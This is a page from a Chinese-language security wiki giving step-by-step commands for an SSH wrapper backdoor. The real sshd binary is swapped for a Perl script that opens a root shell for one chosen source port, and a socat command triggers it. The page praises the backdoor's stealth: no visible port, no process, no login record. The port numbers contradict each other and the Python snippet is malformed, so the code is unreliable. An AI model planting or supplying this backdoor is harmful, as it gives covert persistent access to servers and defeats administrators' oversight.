menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 001-SSH后门 chevron_right 001-SSH wrapper.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-SSH wrapper.md
    1.01 KB / 2021-07-17 00:01:42
        # SSH wrapper
    
    判断连接来源端口,将恶意端口来源访问传输内容重定向到/bin/sh中。
    
    ```bash
    cd /usr/sbin/
    mv sshd ../bin
    vim sshd //编辑sshd内容为以下
    #!/usr/bin/perl
    exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/); // \x00\x00LF是19526的大端形式
    exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;
    service sshd restart
    
    ```
    
    在本机执行
    
    ```bash
    socat STDIO TCP4:127.0.0.1:22,sourceport=19265
    
    ```
    
    ![](images/security_wiki/15905485518709.png)
    
    
    可以看到我利用socat限制了本地端口19526访问server的22端口反回一个sh窗。
    
    修改端口可以修改..LF
    
    ```bash
    import struct
    buffer = struct.pack('>I6',19526)
    print repr(buffer)
    
    ```
    
    ![](images/security_wiki/15905485648373.png)
    
    
    优点:
    
    1、在无连接后门的情况下,管理员是看不到端口和进程的,last也查不到登陆。
    
    2、在针对边界设备出网,内网linux服务器未出网的情况下,留这个后门可以随时管理内网linux服务器,还不会留下文件和恶意网络连接记录。
    
    
    
    links
    file_download